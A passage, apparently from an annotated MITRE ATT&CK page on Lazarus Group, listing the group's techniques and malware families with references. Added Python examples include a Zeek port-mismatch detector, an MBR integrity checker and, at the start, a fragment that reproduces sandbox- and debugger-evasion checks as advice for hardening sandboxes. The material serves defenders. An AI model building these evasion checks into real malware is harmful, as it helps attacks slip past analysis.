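    t0, f0 = k32.GetTickCount(), filetime_now()
    k32.Sleep(requested_ms)
    t1, f1 = k32.GetTickCount(), filetime_now()
    return analysis_environment_detected(k32.GetUserDefaultUILanguage(), t0, t1, f0, f1,
                                         requested_ms, bool(k32.IsDebuggerPresent()))


if __name__ == "__main__":
    if sys.platform == "win32":
        print(probe_windows())
    else:
        # Constructed values: an honest 30 s sleep, then a hooked Sleep() that returned at once.
        print(analysis_environment_detected(0x0409, 1000, 31010, 0, 30_010 * FILETIME_TICKS_PER_MS, 30_000, False))
        print(analysis_environment_detected(0x0409, 1000, 1002, 0, 2 * FILETIME_TICKS_PER_MS, 30_000, False))
```

The practical consequences for a detonation sandbox follow directly from the code: keep the UI language outside the excluded set, let long sleeps actually elapse or accelerate both clocks consistently, and attach analysis tooling in a way that does not set the PEB BeingDebugged flag that IsDebuggerPresent reads.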

Enterprise T1087 .002 Account Discovery: Domain Account

During Operation Dream Job, Lazarus Group queried the compromised victim's Active Directory servers to obtain the list of employees, including administrator accounts.[9]

Enterprise T1098 Account Manipulation

Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.[3][22]

Enterprise T1105 Ingress Tool Transfer

Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.[3][22][16][30][18][14][26][25][15][19]

During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.[10][9][11]

Enterprise T1056 .001 Input Capture: Keylogging

Lazarus Group malware KiloAlfa contains keylogging functionality.[3][28]

Enterprise T1057 Process Discovery

Several Lazarus Group malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by Lazarus Group also gathers process times.[3][16][23][24][18][25]

Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

A Lazarus Group malware sample performs reflective DLL injection.[23][25]

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

Lazarus Group malware SierraCharlie uses RDP for propagation.[3][13]

.002 Remote Services: SMB/Windows Admin Shares

Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.[3][13]

.004 Remote Services: SSH

Lazarus Group used SSH and the PuTTY PSCP utility to gain access to a restricted segment of a compromised network.[14]

Enterprise T1041 Exfiltration Over C2 Channel

Lazarus Group has exfiltrated data and files over a C2 channel through its various tools and malware.[3][16][23]

During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers.[10]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.[9][10]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Lazarus Group has targeted victims with spearphishing emails containing malicious Microsoft Word documents.[29][14][25][15]

During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers.[10][11]

.002 Phishing: Spearphishing Link

Lazarus Group has sent malicious links to victims via email.[14]

During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.[10][9]

.003 Phishing: Spearphishing via Service

Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.[26]

During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.[10][9]

Enterprise T1202 Indirect Command Execution

Lazarus Group persistence mechanisms have used forfiles.exe to execute .htm files.[15]

Enterprise T1564 .001 Hide Artifacts: Hidden Files and Directories

Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.[23][30][18][25]

Enterprise T1571 Non-Standard Port

Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.[3][13]
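The ordered-port-list behaviour described above produces port-protocol mismatches that network telemetry can surface: a connection on 443 that Zeek's dynamic protocol detection cannot identify as TLS, or TLS on a port where HTTP is expected. The Python below is an added example, not ATT&CK's or Zeek project code, that runs that check over constructed Zeek conn.log JSON records; the EXPECTED_SERVICE table, connection uids and addresses are assumptions.

```python
import json
from typing import Dict, List

# Services Zeek's dynamic protocol detection should report on these well-known ports (assumed table).
EXPECTED_SERVICE: Dict[int, set] = {
    22: {"ssh"}, 25: {"smtp"}, 53: {"dns"}, 80: {"http"}, 443: {"ssl"}, 8080: {"http"}, 8443: {"ssl"},
}

# Constructed Zeek conn.log records in JSON form (not a real capture).
SAMPLE_CONN_LOG = """\
{"uid":"CabcD1","id.orig_h":"10.1.1.5","id.resp_h":"203.0.113.10","id.resp_p":443,"proto":"tcp","service":"ssl","orig_bytes":2100,"resp_bytes":5400}
{"uid":"CabcD2","id.orig_h":"10.1.1.5","id.resp_h":"203.0.113.11","id.resp_p":443,"proto":"tcp","orig_bytes":3800,"resp_bytes":12000}
{"uid":"CabcD3","id.orig_h":"10.1.1.7","id.resp_h":"203.0.113.12","id.resp_p":8080,"proto":"tcp","service":"ssl","orig_bytes":900,"resp_bytes":4000}
{"uid":"CabcD4","id.orig_h":"10.1.1.9","id.resp_h":"203.0.113.13","id.resp_p":443,"proto":"tcp","orig_bytes":0,"resp_bytes":0}
{"uid":"CabcD5","id.orig_h":"10.1.1.9","id.resp_h":"203.0.113.14","id.resp_p":80,"proto":"tcp","service":"http","orig_bytes":500,"resp_bytes":2000}
{"uid":"CabcD6","id.orig_h":"10.1.1.9","id.resp_h":"203.0.113.15","id.resp_p":53,"proto":"tcp","orig_bytes":65000,"resp_bytes":1200}
"""


def parse_conn_log(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def services_of(rec: Dict) -> set:
    """Zeek writes 'ssl,http' for layered protocols; an unknown service is omitted (JSON) or '-' (TSV)."""
    raw = rec.get("service") or ""
    return {s for s in raw.split(",") if s and s != "-"}


def port_protocol_mismatches(records: List[Dict]) -> List[Dict]:
    findings = []
    for rec in records:
        port = rec.get("id.resp_p")
        expected = EXPECTED_SERVICE.get(port)
        if expected is None:
            continue  # not a port we hold expectations for
        payload = (rec.get("orig_bytes") or 0) + (rec.get("resp_bytes") or 0)
        if payload == 0:
            continue  # scans, resets and half-opens carry no protocol to judge
        seen = services_of(rec)
        if not seen:
            reason = f"no recognised protocol on {port}/{rec.get('proto')} despite {payload} bytes"
        elif not (seen & expected):
            reason = f"port {port} carrying {','.join(sorted(seen))}, expected {','.join(sorted(expected))}"
        else:
            continue
        findings.append({"uid": rec["uid"], "orig_h": rec.get("id.orig_h"), "resp_h": rec.get("id.resp_h"),
                         "resp_p": port, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in port_protocol_mismatches(parse_conn_log(SAMPLE_CONN_LOG)):
        print(f"{f['uid']} {f['orig_h']} -> {f['resp_h']}:{f['resp_p']}  {f['reason']}")
```

One caveat that follows from the FakeTLS entry above: traffic that completes a plausible TLS handshake and then carries custom-encrypted records may be tagged ssl by the protocol analyzer and pass this check, so port matching complements rather than replaces inspection of the handshake fields in ssl.log.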

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

Lazarus Group has used schtasks for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.[15][19]

During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script.[9]

Enterprise T1542 .003 Pre-OS Boot: Bootkit

Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.[3][22]
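A bootkit that rewrites sector 0, as above, and a wiper that destroys it, as in the SHARPKNOT entry, are both visible by comparing the sector against a known-good copy taken at build time. The Python below is an added example, not ATT&CK's code and not a reconstruction of what WhiskeyAlfa-Three actually writes (the page does not detail that): it parses the documented MBR layout (446 bytes of bootstrap code, four 16-byte partition entries, the 0x55AA signature) and reports how a freshly read sector differs from the baseline. The constructed images, their partition layout and the bootstrap bytes are assumptions.

```python
import hashlib
import struct
from typing import Dict, List

SECTOR_SIZE = 512
CODE_LEN = 446      # bootstrap code area, bytes 0..445
TABLE_OFF = 446     # four 16-byte partition entries, bytes 446..509
SIG_OFF = 510       # boot signature 0x55 0xAA, bytes 510..511
ENTRY_FMT = "<B3sB3sII"  # status, CHS start, type, CHS end, LBA start, sector count (little-endian)


def build_mbr(code: bytes, partitions: List[tuple]) -> bytes:
    """Assemble a sector 0 image from bootstrap code and (status, type, lba_start, sectors) tuples."""
    if len(code) > CODE_LEN or len(partitions) > 4:
        raise ValueError("code must fit in 446 bytes and at most four partitions are allowed")
    buf = bytearray(SECTOR_SIZE)
    buf[:len(code)] = code
    for i, (status, ptype, lba, count) in enumerate(partitions):
        # CHS fields are set to the conventional 'use LBA' filler; modern loaders ignore them.
        struct.pack_into(ENTRY_FMT, buf, TABLE_OFF + 16 * i, status, b"\xfe\xff\xff", ptype, b"\xfe\xff\xff", lba, count)
    buf[SIG_OFF:SIG_OFF + 2] = b"\x55\xaa"
    return bytes(buf)


def parse_mbr(sector: bytes) -> Dict:
    parts = []
    for i in range(4):
        status, _, ptype, _, lba, count = struct.unpack_from(ENTRY_FMT, sector, TABLE_OFF + 16 * i)
        if ptype != 0:  # type 0 means an empty slot
            parts.append({"index": i, "bootable": status == 0x80, "type": ptype, "lba_start": lba, "sectors": count})
    return {
        "signature_ok": sector[SIG_OFF:SIG_OFF + 2] == b"\x55\xaa",
        "code_sha256": hashlib.sha256(sector[:CODE_LEN]).hexdigest(),
        "partitions": parts,
    }


def check_sector0(sector: bytes, baseline: bytes) -> List[str]:
    """Compare a freshly read sector 0 with a known-good copy; an empty list means nothing changed."""
    if len(sector) != SECTOR_SIZE:
        return [f"expected {SECTOR_SIZE} bytes, got {len(sector)}"]
    findings = []
    cur, base = parse_mbr(sector), parse_mbr(baseline)
    if not cur["signature_ok"]:
        findings.append("boot signature 0x55AA missing: sector 0 overwritten or wiped")
    if cur["code_sha256"] != base["code_sha256"]:
        findings.append("bootstrap code differs from baseline: possible bootkit or wiper damage")
    if cur["partitions"] != base["partitions"]:
        findings.append("partition table differs from baseline")
    if cur["signature_ok"] and not any(p["bootable"] for p in cur["partitions"]):
        findings.append("no partition is marked active")
    return findings


# Constructed images for illustration. The bootstrap bytes are a typical MBR prologue
# (xor ax,ax / mov ss,ax / mov sp,0x7c00) padded with NOPs, not a real boot sector dump.
BASELINE_CODE = bytes([0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C]) + b"\x90" * 120
BASELINE_MBR = build_mbr(BASELINE_CODE, [(0x80, 0x07, 2048, 204800)])
TAMPERED_MBR = build_mbr(b"\xEB\xFE" + BASELINE_CODE[2:], [(0x80, 0x07, 2048, 204800)])  # entry point patched
WIPED_MBR = bytes(SECTOR_SIZE)

if __name__ == "__main__":
    for name, img in (("baseline", BASELINE_MBR), ("tampered", TAMPERED_MBR), ("wiped", WIPED_MBR)):
        print(name, check_sector0(img, BASELINE_MBR) or ["ok"])
```

To apply it, read the first 512 bytes of the physical disk (dd if=/dev/sda bs=512 count=1 on Linux; the \\.\PhysicalDrive0 device, opened with administrative rights, on Windows) and keep the baseline off-host. A read performed through the running OS can be filtered by a kernel-resident bootkit, so when integrity actually matters take the sector from rescue media or from the hypervisor rather than from inside the booted system.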

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Lazarus Group has digitally signed malware and utilities to evade detection.[25]

During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection.[9]

ICS T0865 Spearphishing Attachment

Lazarus Group has been observed targeting organizations using spearphishing documents with embedded malicious payloads.[34] Highly targeted spearphishing campaigns have been conducted against a U.S. electric grid company.[35]

Software

S0584 AppleJeus [31]
Techniques: Event Triggered Execution: Installer Packages, Create or Modify System Process: Windows Service, Create or Modify System Process: Launch Daemon, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Unix Shell, Application Layer Protocol: Web Protocols, Obfuscated Files or Information, Abuse Elevation Control Mechanism: Bypass User Account Control, User Execution: Malicious File, User Execution: Malicious Link, Indicator Removal: File Deletion, System Binary Proxy Execution: Msiexec, System Information Discovery, System Services: Launchctl, Virtualization/Sandbox Evasion: Time Based Evasion, Exfiltration Over C2 Channel, Phishing: Spearphishing Link, Hide Artifacts: Hidden Files and Directories, Scheduled Task/Job: Scheduled Task, Subvert Trust Controls: Code Signing

S0347 AuditCred [36]
Techniques: Proxy, Create or Modify System Process: Windows Service, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Windows Command Shell, File and Directory Discovery, Obfuscated Files or Information: Encrypted/Encoded File, Indicator Removal: File Deletion, Ingress Tool Transfer, Process Injection

S0245 BADCALL [37]
Techniques: Proxy, Modify Registry, Encrypted Channel: Symmetric Cryptography, Impair Defenses: Disable or Modify System Firewall, Data Obfuscation: Protocol or Service Impersonation, System Information Discovery, System Network Configuration Discovery, Non-Standard Port

S0239 Bankshot [29]
Techniques: Data from Local System, Modify Registry, Create or Modify System Process: Windows Service, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Windows Command Shell, Exploitation for Client Execution, Application Layer Protocol: Web Protocols, Data Obfuscation: Protocol or Service Impersonation, Data Encoding: Non-Standard Encoding, File and Directory Discovery, Native API, Query Registry, Indicator Removal: File Deletion, Indicator Removal: Timestomp, Indicator Removal, System Information Discovery, Automated Collection, Access Token Manipulation: Create Process with Token, Account Discovery: Local Account, Account Discovery: Domain Account, Ingress Tool Transfer, Process Discovery, Exfiltration Over C2 Channel, Non-Standard Port

S0520 BLINDINGCAN [38]
Techniques: Data from Local System, Masquerading: Match Legitimate Name or Location, Shared Modules, Encrypted Channel: Symmetric Cryptography, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, Data Encoding: Standard Encoding, File and Directory Discovery, Obfuscated Files or Information: Encrypted/Encoded File, Obfuscated Files or Information: Software Packing, User Execution: Malicious File, Indicator Removal: File Deletion, Indicator Removal: Timestomp, System Binary Proxy Execution: Rundll32, System Information Discovery, System Network Configuration Discovery, Ingress Tool Transfer, Exfiltration Over C2 Channel, Phishing: Spearphishing Attachment, Subvert Trust Controls: Code Signing

S0498 Cryptoistic [30]
Techniques: Data from Local System, Encrypted Channel, File and Directory Discovery, Indicator Removal: File Deletion, System Owner/User Discovery, Ingress Tool Transfer, Non-Application Layer Protocol

S0497 Dacls [30][18]
Techniques: Masquerading, Create or Modify System Process: Launch Agent, Create or Modify System Process: Launch Daemon, Application Layer Protocol: Web Protocols, File and Directory Discovery, Obfuscated Files or Information: Encrypted/Encoded File, Ingress Tool Transfer, Process Discovery, Hide Artifacts: Hidden Files and Directories

S0694 DRATzarus
Use: During Operation Dream Job, Lazarus Group used DRATzarus to deploy open source software and partly commodity software such as Responder, Wake-On-Lan, and ChromePass to target infected hosts.[10]
Techniques: Data from Local System, Masquerading: Match Legitimate Name or Location, Application Layer Protocol: Web Protocols, Native API, Obfuscated Files or Information: Software Packing, Obfuscated Files or Information, System Owner/User Discovery, System Time Discovery, Virtualization/Sandbox Evasion: Time Based Evasion, Debugger Evasion, Ingress Tool Transfer, Process Discovery, Remote System Discovery

S0567 Dtrack [39]
Techniques: Data from Local System, Masquerading: Match Legitimate Name or Location, Shared Modules, Create or Modify System Process: Windows Service, Hijack Execution Flow, Deobfuscate/Decode Files or Information, Boot or Logon Autostart Execution, Command and Scripting Interpreter: Windows Command Shell, Archive Collected Data, Data Staged: Local Data Staging, File and Directory Discovery, Valid Accounts, Query Registry, Browser Information Discovery, Obfuscated Files or Information: Embedded Payloads, Indicator Removal: File Deletion, System Information Discovery, System Network Connections Discovery, System Network Configuration Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Process Injection: Process Hollowing

S0593 ECCENTRICBANDWAGON [40]
Techniques: Command and Scripting Interpreter: Windows Command Shell, Screen Capture, Data Staged: Local Data Staging, Obfuscated Files or Information, Indicator Removal: File Deletion, Input Capture: Keylogging

S0181 FALLCHILL [17]
Techniques: Create or Modify System Process: Windows Service, Encrypted Channel: Symmetric Cryptography, Data Obfuscation: Protocol or Service Impersonation, File and Directory Discovery, Indicator Removal: Timestomp, Indicator Removal: File Deletion, System Information Discovery, System Network Configuration Discovery

S0246 HARDRAIN [41]
Techniques: Proxy, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify System Firewall, Data Obfuscation: Protocol or Service Impersonation, Non-Standard Port

S0376 HOPLIGHT [5]
Techniques: Windows Management Instrumentation, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Proxy, Use Alternate Authentication Material: Pass the Hash, Modify Registry, Command and Scripting Interpreter: Windows Command Shell, Fallback Channels, Impair Defenses: Disable or Modify System Firewall, OS Credential Dumping: Security Account Manager, Data Encoding: Standard Encoding, File and Directory Discovery, Query Registry, System Information Discovery, System Time Discovery, System Services: Service Execution, Device Driver Discovery, Ingress Tool Transfer, Process Injection, Exfiltration Over C2 Channel, Non-Standard Port

S0431 HotCroissant [42]
Techniques: Encrypted Channel: Symmetric Cryptography, Command and Scripting Interpreter: Windows Command Shell, Screen Capture, Application Window Discovery, File and Directory Discovery, Service Stop, Native API, Obfuscated Files or Information: Software Packing, Obfuscated Files or Information: Encrypted/Encoded File, Indicator Removal: File Deletion, System Information Discovery, System Owner/User Discovery, System Service Discovery, System Network Configuration Discovery, Software Discovery, Ingress Tool Transfer, Process Discovery, Exfiltration Over C2 Channel, Hide Artifacts: Hidden Window, Scheduled Task/Job: Scheduled Task

S0271 KEYMARBLE [43]
Techniques: Modify Registry, Encrypted Channel: Symmetric Cryptography, Command and Scripting Interpreter: Windows Command Shell, Screen Capture, File and Directory Discovery, Indicator Removal: File Deletion, System Information Discovery, System Network Configuration Discovery, Ingress Tool Transfer, Process Discovery

S0108 netsh [16]
Techniques: Event Triggered Execution: Netsh Helper DLL, Proxy, Impair Defenses: Disable or Modify System Firewall, Software Discovery: Security Software Discovery

S0238 Proxysvc [24]
Techniques: Data from Local System, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, Data Destruction, File and Directory Discovery, Query Registry, Indicator Removal: File Deletion, System Information Discovery, System Time Discovery, System Services: Service Execution, System Network Configuration Discovery, Automated Collection, Process Discovery, Exfiltration Over C2 Channel

S0241 RATANKBA [44]
Techniques: Windows Management Instrumentation, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: PowerShell, Application Layer Protocol: Web Protocols, Query Registry, System Information Discovery, System Owner/User Discovery, System Service Discovery, System Network Connections Discovery, System Network Configuration Discovery, Account Discovery: Local Account, Ingress Tool Transfer, Process Discovery, Process Injection: Dynamic-link Library Injection, Remote System Discovery

S0364 RawDisk [3][22]
Techniques: Data Destruction, Disk Wipe: Disk Structure Wipe, Disk Wipe: Disk Content Wipe

S0174 Responder [10]
Techniques: Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Network Sniffing

S0103 route [14]
Techniques: System Network Configuration Discovery

S0586 TAINTEDSCRIBE [20]
Techniques: Masquerading: Match Legitimate Name or Location, Encrypted Channel: Symmetric Cryptography, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Fallback Channels, Archive Collected Data, Data Obfuscation: Protocol or Service Impersonation, File and Directory Discovery, Obfuscated Files or Information: Binary Padding, Indicator Removal: Timestomp, Indicator Removal: File Deletion, System Information Discovery, System Time Discovery, Ingress Tool Transfer, Process Discovery, Remote System Discovery

S0665 ThreatNeedle [14]
Techniques: Data from Local System, Masquerading: Match Legitimate Name or Location, Modify Registry, Create or Modify System Process: Windows Service, Deobfuscate/Decode Files or Information, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, File and Directory Discovery, Obfuscated Files or Information: Encrypted/Encoded File, Obfuscated Files or Information: Fileless Storage, User Execution: Malicious File, System Information Discovery, Ingress Tool Transfer, Phishing: Spearphishing Attachment

S0678 Torisma
Use: During Operation Dream Job, Lazarus Group used Torisma to actively monitor for new drives and remote desktop connections on an infected system.[11][12]
Techniques: Encrypted Channel: Symmetric Cryptography, Deobfuscate/Decode Files or Information, Application Layer Protocol: Web Protocols, Execution Guardrails, Data Encoding: Standard Encoding, Native API, Obfuscated Files or Information: Encrypted/Encoded File, Obfuscated Files or Information: Software Packing, System Information Discovery, System Time Discovery, System Network Connections Discovery, System Network Configuration Discovery, Exfiltration Over C2 Channel

S0263 TYPEFRAME [45]
Techniques: Proxy, Modify Registry, Create or Modify System Process: Windows Service, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify System Firewall, File and Directory Discovery, Obfuscated Files or Information: Fileless Storage, Obfuscated Files or Information: Encrypted/Encoded File, User Execution: Malicious File, Indicator Removal: File Deletion, System Information Discovery, Ingress Tool Transfer, Non-Standard Port

S0180 Volgmer [46]
Techniques: Masquerading: Masquerade Task or Service, Modify Registry, Create or Modify System Process: Windows Service, Encrypted Channel: Symmetric Cryptography, Encrypted Channel: Asymmetric Cryptography, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Windows Command Shell, File and Directory Discovery, Native API, Query Registry, Obfuscated Files or Information: Fileless Storage, Obfuscated Files or Information: Encrypted/Encoded File, Indicator Removal: File Deletion, System Information Discovery, System Service Discovery, System Network Connections Discovery, System Network Configuration Discovery, Ingress Tool Transfer, Process Discovery

S0366 WannaCry [47][48][49][50]
Techniques: Exploitation of Remote Services, Lateral Tool Transfer, Windows Management Instrumentation, Proxy: Multi-hop Proxy, Create or Modify System Process: Windows Service, Encrypted Channel: Asymmetric Cryptography, Peripheral Device Discovery, Data Encrypted for Impact, File and Directory Discovery, File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Service Stop, Inhibit System Recovery, System Network Configuration Discovery, Remote Service Session Hijacking: RDP Hijacking, Remote System Discovery, Hide Artifacts: Hidden Files and Directories

References

  1. US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.
  2. US Treasury. (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.
  3. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
  4. CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.
  5. US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
  6. Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.
  7. Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.
  8. Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  9. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
  10. ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
  11. Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
  12. Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.
  13. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools & Content Staging Malware Report. Retrieved March 16, 2016.
  14. Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.
  15. Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.
  16. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.
  17. US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.
  18. Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.
  19. Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved September 12, 2024.
  20. USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.
  21. Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. Retrieved April 10, 2023.
  22. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
  23. Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.
  24. Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.
  25. Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.
  26. Weidemann, A. (2021, January 25). New campaign targeting security researchers. Retrieved December 20, 2021.
  27. US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.
  28. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Tools Report. Retrieved March 10, 2016.
  29. Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.
  30. Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.
  31. Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.
  32. Sherstobitoff, R. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved August 15, 2024.
  33. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
  34. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
  35. Kovacs, E. (2018, March 1). Five Threat Groups Target Industrial Systems: Dragos. Retrieved January 3, 2020.
  36. Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.
  37. US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.
  38. US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.
  39. Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021.
  40. Cybersecurity and Infrastructure Security Agency. (2020, August 26). MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON. Retrieved March 18, 2021.
  41. US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.
  42. US-CERT. (2020, February 20). MAR-10271944-1.v1 – North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020.
  43. US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.
  44. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
  45. US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.
  46. US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.
  47. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
  48. Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.
  49. Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.
  50. Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.